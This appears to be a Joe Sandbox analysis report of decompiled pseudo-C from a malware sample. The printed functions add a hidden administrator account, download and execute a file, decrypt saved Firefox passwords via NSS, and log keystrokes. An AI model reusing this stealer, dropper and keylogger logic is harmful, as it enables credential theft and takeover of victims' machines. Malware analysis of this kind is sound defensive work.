                                      			E0040D2C9(void* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				short _v12;
                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                      				long _v20;
                                      				long _v24;
                                      				union _SID_NAME_USE _v28;
                                      				short _v60;
                                      				short _v580;
                                      				void* _t37;
                                      
                                      				_v20 = 0x10;
                                      				_v8 = 0;
                                      				_t37 = __ecx;
                                      				_v16.Value = 0;
                                      				_v12 = 0x500;
                                      				E00401052( &_v580, 0, 0x208);
                                      				_v24 = 0x104;
                                      				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
                                      					GetLastError();
                                      				}
                                      				if(_v8 != 0) {
                                      					FreeSid(_v8);
                                      				}
                                      				E004033AB(_t37,  &_v580);
                                      				return _t37;
                                      			}












                                      0x0040d2d6
                                      0x0040d2e8
                                      0x0040d2ed
                                      0x0040d2ef
                                      0x0040d2f2
                                      0x0040d2f8
                                      0x0040d300
                                      0x0040d326
                                      0x0040d34d
                                      0x0040d34d
                                      0x0040d356
                                      0x0040d35b
                                      0x0040d35b
                                      0x0040d36a
                                      0x0040d374

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040B5B6,?,?,00000001), ref: 0040D31E
                                      • LookupAccountSidW.ADVAPI32(00000000,0040B5B6,?,00000104,?,00000010,?), ref: 0040D343
                                      • GetLastError.KERNEL32(?,?,00000001), ref: 0040D34D
                                      • FreeSid.ADVAPI32(0040B5B6,?,?,00000001), ref: 0040D35B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                      • String ID:
                                      • API String ID: 1866703397-0
                                      • Opcode ID: 7ead7305882b7dc886f07fa9173832ee46511fb401dc2f31b7fe3a49917cc7bb
                                      • Instruction ID: 334ab5876d2aba259553a6502469595c618b91c65a01fb44ce39d128aa09844e
                                      • Opcode Fuzzy Hash: 7ead7305882b7dc886f07fa9173832ee46511fb401dc2f31b7fe3a49917cc7bb
                                      • Instruction Fuzzy Hash: 9811CBB190021DABDB10DFD1DD89AEFBBBCEB08344F10417AE605E2190D7749B489BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040D450(WCHAR** __ecx, intOrPtr* __edx) {
                                      				struct HRSRC__* _t13;
                                      				void* _t14;
                                      				unsigned int _t32;
                                      				intOrPtr* _t35;
                                      				struct HINSTANCE__* _t36;
                                      
                                      				_t35 = __edx;
                                      				_t36 = LoadLibraryExW( *__ecx, 0, 2);
                                      				if(_t36 == 0xffffffff) {
                                      					L4:
                                      					return 0;
                                      				}
                                      				_t13 = FindResourceW(_t36, 1, 0x10);
                                      				if(_t13 == 0) {
                                      					goto L4;
                                      				}
                                      				_t14 = LoadResource(_t36, _t13);
                                      				if(_t14 == 0) {
                                      					goto L4;
                                      				}
                                      				_t32 =  *(_t14 + 0x28);
                                      				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
                                      				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
                                      				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
                                      				 *(_t35 + 8) = _t32 & 1;
                                      				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
                                      				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
                                      				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
                                      				FreeLibrary(_t36);
                                      				return 1;
                                      			}








                                      0x0040d459
                                      0x0040d461
                                      0x0040d466
                                      0x0040d4ca
                                      0x00000000
                                      0x0040d4ca
                                      0x0040d46f
                                      0x0040d477
                                      0x00000000
                                      0x00000000
                                      0x0040d47b
                                      0x0040d483
                                      0x00000000
                                      0x00000000
                                      0x0040d488
                                      0x0040d48b
                                      0x0040d491
                                      0x0040d49d
                                      0x0040d4a1
                                      0x0040d4b6
                                      0x0040d4ba
                                      0x0040d4bd
                                      0x0040d4c0
                                      0x00000000

                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D45B
                                      • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D46F
                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D47B
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040BDEF), ref: 0040D4C0
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadResource$FindFree
                                      • String ID:
                                      • API String ID: 3272429154-0
                                      • Opcode ID: 5d15f8974ed7cc1a5e341c81c565cad18f7e7614c1fcc42718d7a568df6e1744
                                      • Instruction ID: e6de038d9c85ff7a3f0a57d6dbaf571f5244e1517d455b0afe1d62e5f2af1bb9
                                      • Opcode Fuzzy Hash: 5d15f8974ed7cc1a5e341c81c565cad18f7e7614c1fcc42718d7a568df6e1744
                                      • Instruction Fuzzy Hash: 9101D2B1710A02AFD3088F65DC85AA6B7A4FF48310714C339EA19C33E0D774D815C7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E0040264B(void* __ecx, void* __eflags, signed int _a4) {
                                      				short* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _t26;
                                      				void* _t36;
                                      				void* _t38;
                                      				void* _t42;
                                      				void* _t58;
                                      				void* _t59;
                                      
                                      				_t66 = __eflags;
                                      				_t42 = __ecx;
                                      				_t58 = 0x1a;
                                      				E0040D51C( &_v12, _t58, __eflags);
                                      				_t59 = 0xa;
                                      				_t26 = E0040326D( &_v16, _t59, __eflags);
                                      				E004030FB(E00403230( &_v12, _t59, _t66, "\\"), _t66, _t26);
                                      				E004058FB(_v16);
                                      				_t61 = _a4 + 4;
                                      				E004033F3( &_v16, _a4 + 4);
                                      				E004030FB( &_v12, _t66, E004032E3( &_v16,  &_a4));
                                      				E004058FB(_a4);
                                      				_a4 = _a4 & 0x00000000;
                                      				E004058FB(_v16);
                                      				_t36 = E004033F3( &_a4, _t61);
                                      				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
                                      				E004058FB(_a4);
                                      				if(_t36 == 0) {
                                      					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
                                      					_v16 = 2;
                                      					__eflags = _t38 - 0x20;
                                      					if(_t38 > 0x20) {
                                      						_v16 = 0;
                                      					}
                                      				} else {
                                      					_v16 = 1;
                                      				}
                                      				_v20 = 0x4125a4;
                                      				E00404A3D(_t42,  &_v20);
                                      				return E004058FB(_v12);
                                      			}












                                      0x0040264b
                                      0x00402654
                                      0x0040265b
                                      0x0040265c
                                      0x00402663
                                      0x00402667
                                      0x0040267e
                                      0x00402686
                                      0x00402691
                                      0x00402695
                                      0x004026aa
                                      0x004026b2
                                      0x004026ba
                                      0x004026be
                                      0x004026ca
                                      0x004026d8
                                      0x004026e3
                                      0x004026ea
                                      0x00402702
                                      0x00402708
                                      0x0040270f
                                      0x00402712
                                      0x00402714
                                      0x00402714
                                      0x004026ec
                                      0x004026ec
                                      0x004026ec
                                      0x0040271a
                                      0x00402724
                                      0x00402735

                                      APIs
                                        • Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D
                                        • Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 004032E3: PathFindExtensionW.SHLWAPI(?), ref: 004032ED
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004026D8
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00402702
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                      • String ID: open
                                      • API String ID: 4166385161-2758837156
                                      • Opcode ID: 32b418ae1fee956fca46b7227a99302008e1dc8d90f7d94feb650825211c3c04
                                      • Instruction ID: 7d18c0bc51ad2404c9d7291eac21bd67f322441bd230aa74e5acf51f38df913e
                                      • Opcode Fuzzy Hash: 32b418ae1fee956fca46b7227a99302008e1dc8d90f7d94feb650825211c3c04
                                      • Instruction Fuzzy Hash: 44214136A00208BBCB14AFA5C986DEE7B78EF85719F00806EF816771C1DB785A45DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E00409C70(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
                                      				int _v8;
                                      				DWORD* _v12;
                                      				DWORD* _v16;
                                      				void* _v20;
                                      				int _v24;
                                      				BYTE* _v28;
                                      				char _v32;
                                      				char _v8128;
                                      				int _t27;
                                      				CHAR* _t39;
                                      				void* _t43;
                                      
                                      				_t43 = __ecx;
                                      				E00401130(0x1fbc, __ecx);
                                      				_v8 = 0x1fa0;
                                      				_t27 = lstrlenA(_a4);
                                      				E00401052( &_v8128, 0, 0x1fa0);
                                      				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
                                      				_v32 = 0;
                                      				_v28 =  &_v8128;
                                      				_v24 = _v8;
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v20 = 0;
                                      				 *((intOrPtr*)(_t43 + 0x68))( &_v32,  &_v20, 0);
                                      				 *((char*)(_v12 + _v16)) = 0;
                                      				_t39 = E0040590A(_v12 + 1);
                                      				 *_a8 = _t39;
                                      				return lstrcpyA(_t39, _v16);
                                      			}














                                      0x00409c70
                                      0x00409c78
                                      0x00409c8a
                                      0x00409c8d
                                      0x00409ca0
                                      0x00409cbb
                                      0x00409cc7
                                      0x00409cca
                                      0x00409cd0
                                      0x00409cdb
                                      0x00409cdf
                                      0x00409ce2
                                      0x00409ce5
                                      0x00409cf1
                                      0x00409cfa
                                      0x00409d06
                                      0x00409d12

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,00409566,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00409C8D
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00409CBB
                                        • Part of subcall function 0040590A: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403418,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00405914
                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00409D08
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                      • String ID:
                                      • API String ID: 573875632-0
                                      • Opcode ID: 13de05a77557a64dc6a0c0ece0edb854a0c133b5ba4a5673c8a0fc1e9c5872d1
                                      • Instruction ID: 7f984b37708a3500988b97faece6023182ea8004ba806bbf7cf8fbeaa28c1260
                                      • Opcode Fuzzy Hash: 13de05a77557a64dc6a0c0ece0edb854a0c133b5ba4a5673c8a0fc1e9c5872d1
                                      • Instruction Fuzzy Hash: 7611D6B690020DAFCB00DF95D8848EEBBB8EB08344F10817AF909E3251D7759A45CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E0040B55D(char _a4, char _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v32;
                                      				void _v36;
                                      				void* _t22;
                                      				intOrPtr* _t25;
                                      				signed int _t30;
                                      				intOrPtr* _t38;
                                      
                                      				_t38 = _a4;
                                      				_t30 = 8;
                                      				memset( &_v36, 0, _t30 << 2);
                                      				_v36 =  *_t38;
                                      				_v24 = 1;
                                      				_v20 = 0;
                                      				_v32 =  *_a8;
                                      				_t22 =  &_v36;
                                      				_v16 = 0;
                                      				_v12 = 0x10201;
                                      				_v8 = 0;
                                      				__imp__NetUserAdd(0, 1, _t22, 0);
                                      				_t42 = _t22;
                                      				if(_t22 != 0) {
                                      					L3:
                                      					__eflags = 0;
                                      					return 0;
                                      				}
                                      				_a4 =  *_t38;
                                      				_t25 = E0040D2C9( &_a8, _t42);
                                      				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
                                      				E004058FB(_a8);
                                      				if(_t25 != 0) {
                                      					goto L3;
                                      				}
                                      				return 1;
                                      			}














                                      0x0040b565
                                      0x0040b56d
                                      0x0040b573
                                      0x0040b579
                                      0x0040b581
                                      0x0040b584
                                      0x0040b589
                                      0x0040b58c
                                      0x0040b592
                                      0x0040b595
                                      0x0040b59c
                                      0x0040b59f
                                      0x0040b5a5
                                      0x0040b5a7
                                      0x0040b5d8
                                      0x0040b5d8
                                      0x00000000
                                      0x0040b5d8
                                      0x0040b5ae
                                      0x0040b5b1
                                      0x0040b5c0
                                      0x0040b5cb
                                      0x0040b5d2
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,00417D24,?,?,?,0040C67C,00417D20,00417D24), ref: 0040B59F
                                        • Part of subcall function 0040D2C9: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040B5B6,?,?,00000001), ref: 0040D31E
                                        • Part of subcall function 0040D2C9: LookupAccountSidW.ADVAPI32(00000000,0040B5B6,?,00000104,?,00000010,?), ref: 0040D343
                                        • Part of subcall function 0040D2C9: GetLastError.KERNEL32(?,?,00000001), ref: 0040D34D
                                        • Part of subcall function 0040D2C9: FreeSid.ADVAPI32(0040B5B6,?,?,00000001), ref: 0040D35B
                                      • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040C67C,00417D20,00417D24), ref: 0040B5C0
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                      • String ID:
                                      • API String ID: 188019324-0
                                      • Opcode ID: 0d77d6f1052675918caacd119e161bd4e254674f2e264095daca47873fb553a0
                                      • Instruction ID: b0798810341bc1557ea5804e67944a3c553e3cd416051ae7d3b6402d41834199
                                      • Opcode Fuzzy Hash: 0d77d6f1052675918caacd119e161bd4e254674f2e264095daca47873fb553a0
                                      • Instruction Fuzzy Hash: 4D112E76A00208AFDB11DFA9C8848EEF7F8FF59314B00856BF951F7250D7B49A048B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 98%
                                      			E0040A190(void* __ecx, void* __edx, WCHAR* _a4) {
                                      				WCHAR* _v8;
                                      				long _v12;
                                      				WCHAR* _v16;
                                      				WCHAR* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				WCHAR* _v32;
                                      				WCHAR* _v36;
                                      				WCHAR* _v40;
                                      				short _v560;
                                      				struct HINSTANCE__* _t135;
                                      				WCHAR* _t158;
                                      				intOrPtr _t194;
                                      				void* _t206;
                                      				void* _t216;
                                      				void* _t218;
                                      
                                      				_t206 = __edx;
                                      				_t158 = 0;
                                      				_t216 = __ecx;
                                      				E00401052( &_v560, 0, 0x104);
                                      				GetCurrentDirectoryW(0x104,  &_v560);
                                      				SetCurrentDirectoryW(_a4);
                                      				E00403230( &_a4, _t206, 0, "\\");
                                      				E004033F3( &_v40,  &_a4);
                                      				E00403230( &_v40, _t206, 0, L"nss3.dll");
                                      				E004033F3( &_v20,  &_a4);
                                      				E00403230( &_v20, _t206, 0, L"msvcr120.dll");
                                      				E004033F3( &_v16,  &_a4);
                                      				E00403230( &_v16, _t206, 0, L"msvcp120.dll");
                                      				E004033F3( &_v36,  &_a4);
                                      				E00403230( &_v36, _t206, 0, L"mozglue.dll");
                                      				E004033F3( &_v32,  &_a4);
                                      				E00403230( &_v32, _t206, 0, L"softokn3.dll");
                                      				E004033F3( &_v28,  &_a4);
                                      				E00403230( &_v28, _t206, 0, L"msvcp");
                                      				E004033F3( &_v24,  &_a4);
                                      				E00403230( &_v24, _t206, 0, L"msvcr");
                                      				_t218 = 0x5a;
                                      				_v12 = 0x104;
                                      				while(1) {
                                      					E004033F3( &_v8,  &_v28);
                                      					E00403230(E00403038( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                      					if(PathFileExistsW(_v8) != 0) {
                                      						break;
                                      					}
                                      					_v12 = _v12 + 0xa;
                                      					E004058FB(_v8);
                                      					_t224 = _v12 - 0x96;
                                      					_v8 = _t158;
                                      					if(_v12 != 0x96) {
                                      						continue;
                                      					} else {
                                      						while(1) {
                                      							L5:
                                      							E004033F3( &_v8,  &_v24);
                                      							E00403230(E00403038( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                      							if(PathFileExistsW(_v8) != 0) {
                                      								break;
                                      							}
                                      							_t218 = _t218 + 0xa;
                                      							E004058FB(_v8);
                                      							_v8 = _t158;
                                      							if(_t218 != 0x96) {
                                      								continue;
                                      							}
                                      							L9:
                                      							 *((intOrPtr*)(_t216 + 0xa0)) = LoadLibraryW(_v20);
                                      							 *((intOrPtr*)(_t216 + 0xa4)) = LoadLibraryW(_v16);
                                      							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v36);
                                      							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v40);
                                      							_t135 = LoadLibraryW(_v32);
                                      							 *(_t216 + 0xb0) = _t135;
                                      							if( *((intOrPtr*)(_t216 + 0xa4)) != _t158 &&  *((intOrPtr*)(_t216 + 0xa8)) != _t158) {
                                      								_t194 =  *((intOrPtr*)(_t216 + 0xac));
                                      								if(_t194 != 0) {
                                      									_t230 = _t135;
                                      									if(_t135 != 0) {
                                      										_push(_t194);
                                      										 *((intOrPtr*)(_t216 + 0x60)) = E0040E579(_t194, "NSS_Init", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x78)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_GetInternalKeySlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x74)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_Authenticate", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x68)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11SDR_Decrypt", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x6c)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "NSSBase64_DecodeBuffer", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x70)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_CheckUserPassword", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x64)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "NSS_Shutdown", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x7c)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PK11_FreeSlot", _t230);
                                      										 *((intOrPtr*)(_t216 + 0x80)) = E0040E579( *((intOrPtr*)(_t216 + 0xac)), "PR_GetError", _t230);
                                      										SetCurrentDirectoryW( &_v560);
                                      										_t158 = 1;
                                      									}
                                      								}
                                      							}
                                      							E004058FB(_v24);
                                      							E004058FB(_v28);
                                      							E004058FB(_v32);
                                      							E004058FB(_v36);
                                      							E004058FB(_v16);
                                      							E004058FB(_v20);
                                      							E004058FB(_v40);
                                      							E004058FB(_a4);
                                      							return _t158;
                                      						}
                                      						E004031FD( &_v20,  &_v8);
                                      						E004058FB(_v8);
                                      						goto L9;
                                      					}
                                      				}
                                      				E004031FD( &_v16,  &_v8);
                                      				E004058FB(_v8);
                                      				goto L5;
                                      			}



















                                      0x0040a190
                                      0x0040a1a8
                                      0x0040a1aa
                                      0x0040a1ae
                                      0x0040a1be
                                      0x0040a1c7
                                      0x0040a1d5
                                      0x0040a1e1
                                      0x0040a1ee
                                      0x0040a1fa
                                      0x0040a207
                                      0x0040a213
                                      0x0040a220
                                      0x0040a22c
                                      0x0040a239
                                      0x0040a245
                                      0x0040a252
                                      0x0040a25e
                                      0x0040a26b
                                      0x0040a277
                                      0x0040a284
                                      0x0040a28b
                                      0x0040a28c
                                      0x0040a28f
                                      0x0040a296
                                      0x0040a2ad
                                      0x0040a2bd
                                      0x00000000
                                      0x00000000
                                      0x0040a2c2
                                      0x0040a2c6
                                      0x0040a2cb
                                      0x0040a2d2
                                      0x0040a2d5
                                      0x00000000
                                      0x0040a2d7
                                      0x0040a2ed
                                      0x0040a2ed
                                      0x0040a2f4
                                      0x0040a309
                                      0x0040a319
                                      0x00000000
                                      0x00000000
                                      0x0040a31e
                                      0x0040a321
                                      0x0040a326
                                      0x0040a32f
                                      0x00000000
                                      0x00000000
                                      0x0040a347
                                      0x0040a355
                                      0x0040a360
                                      0x0040a36b
                                      0x0040a376
                                      0x0040a37c
                                      0x0040a37e
                                      0x0040a38a
                                      0x0040a39c
                                      0x0040a3a4
                                      0x0040a3aa
                                      0x0040a3ac
                                      0x0040a3b2
                                      0x0040a3c8
                                      0x0040a3db
                                      0x0040a3ee
                                      0x0040a401
                                      0x0040a414
                                      0x0040a427
                                      0x0040a43a
                                      0x0040a44d
                                      0x0040a455
                                      0x0040a463
                                      0x0040a46b
                                      0x0040a46b
                                      0x0040a3ac
                                      0x0040a3a4
                                      0x0040a46f
                                      0x0040a477
                                      0x0040a47f
                                      0x0040a487
                                      0x0040a48f
                                      0x0040a497
                                      0x0040a49f
                                      0x0040a4a7
                                      0x0040a4b2
                                      0x0040a4b2
                                      0x0040a33a
                                      0x0040a342
                                      0x00000000
                                      0x0040a342
                                      0x0040a2d5
                                      0x0040a2e0
                                      0x0040a2e8
                                      0x00000000

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A1BE
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A1C7
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 00403038: wsprintfW.USER32 ref: 00403053
                                      • PathFileExistsW.SHLWAPI(0040927E), ref: 0040A2B5
                                      • PathFileExistsW.SHLWAPI(0040927E), ref: 0040A311
                                      • LoadLibraryW.KERNEL32(?,0040927E,?,00000104,00000000), ref: 0040A350
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A35B
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A366
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A371
                                      • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A37C
                                      • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A463
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                      • API String ID: 410702425-850564384
                                      • Opcode ID: 03cc6d500c5ef4627c6173b8503942e9184efd6205174026926cbcde03ab17df
                                      • Instruction ID: a84aad35f4fb42e2e59513eaa3ff0b1b9c8996ec607a67ff7e911fe5e49831e7
                                      • Opcode Fuzzy Hash: 03cc6d500c5ef4627c6173b8503942e9184efd6205174026926cbcde03ab17df
                                      • Instruction Fuzzy Hash: C3913E31A00609EBCB04EFA1D9829DEBB78FF44305F10817FA446B7191DF786A64DB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00407B2E(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				char _v524;
                                      				short _v564;
                                      				intOrPtr _v568;
                                      				short _v570;
                                      				short _v572;
                                      				long _v596;
                                      				char _v600;
                                      				int _v604;
                                      				char _v612;
                                      				intOrPtr _v616;
                                      				struct _OVERLAPPED* _v620;
                                      				char _v624;
                                      				char _v628;
                                      				void* _v632;
                                      				char _v636;
                                      				intOrPtr _v640;
                                      				struct _OVERLAPPED* _v644;
                                      				char _v648;
                                      				void* _t76;
                                      				short _t77;
                                      				void* _t82;
                                      				char* _t84;
                                      				struct _OVERLAPPED** _t86;
                                      				long _t88;
                                      				intOrPtr _t93;
                                      				intOrPtr* _t96;
                                      				long _t100;
                                      				intOrPtr _t101;
                                      				WCHAR* _t102;
                                      				intOrPtr _t104;
                                      				void* _t105;
                                      				long _t109;
                                      				void* _t110;
                                      				intOrPtr _t111;
                                      				intOrPtr _t113;
                                      				long _t116;
                                      				intOrPtr _t117;
                                      				intOrPtr _t119;
                                      				long _t121;
                                      				intOrPtr _t122;
                                      				intOrPtr _t124;
                                      				void* _t126;
                                      				intOrPtr _t128;
                                      				intOrPtr _t130;
                                      				long _t132;
                                      				intOrPtr _t133;
                                      				intOrPtr _t135;
                                      				DWORD* _t136;
                                      				long _t137;
                                      				intOrPtr _t138;
                                      				long _t142;
                                      				void* _t152;
                                      				long _t164;
                                      				intOrPtr _t178;
                                      				intOrPtr _t189;
                                      				void* _t195;
                                      				struct _OVERLAPPED* _t198;
                                      				struct _OVERLAPPED* _t201;
                                      				void* _t204;
                                      				void* _t206;
                                      				void* _t208;
                                      				signed int _t209;
                                      				void* _t212;
                                      				void* _t213;
                                      
                                      				_t198 = 0;
                                      				_v600 = 0;
                                      				E00401052( &_v524, 0, 0x208);
                                      				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                      				_t201 = 0;
                                      				_v604 = 0;
                                      				_t76 = _a8 - 1;
                                      				if(_t76 == 0) {
                                      					_t77 = 6;
                                      					_v570 = _t77;
                                      					__eflags = 1;
                                      					_v564 = _a4;
                                      					_v568 = 0x130;
                                      					_v572 = 1;
                                      					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                      				} else {
                                      					_t82 = _t76 - 0xf;
                                      					if(_t82 == 0) {
                                      						PostQuitMessage(0);
                                      					} else {
                                      						if(_t82 == 0xef) {
                                      							_t84 =  &_v600;
                                      							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                      							__eflags = _t84 - 0xffffffff;
                                      							if(_t84 != 0xffffffff) {
                                      								_t164 = E004059A9(_v620);
                                      								_v596 = _t164;
                                      								__eflags = _t164;
                                      								if(_t164 != 0) {
                                      									_t86 =  &_v620;
                                      									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                      									__eflags = _t86 - _v640;
                                      									if(_t86 == _v640) {
                                      										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                      										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                      											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                      											__eflags = _t88;
                                      											if(_t88 <= 0) {
                                      												E004030C5( &_v644, _t195, L"Unknow");
                                      											} else {
                                      												E004031FD( &_v648, E004033AB( &_v636,  &_v564));
                                      												E004058FB(_v644);
                                      											}
                                      											E00407FAE( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                      											E004031FD( &_v632,  &_v644);
                                      											_t93 =  *0x4166ac; // 0x416d98
                                      											E00403230( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                      											_t96 =  *0x4166ac; // 0x416d98
                                      											__eflags =  *_t96 - _t198;
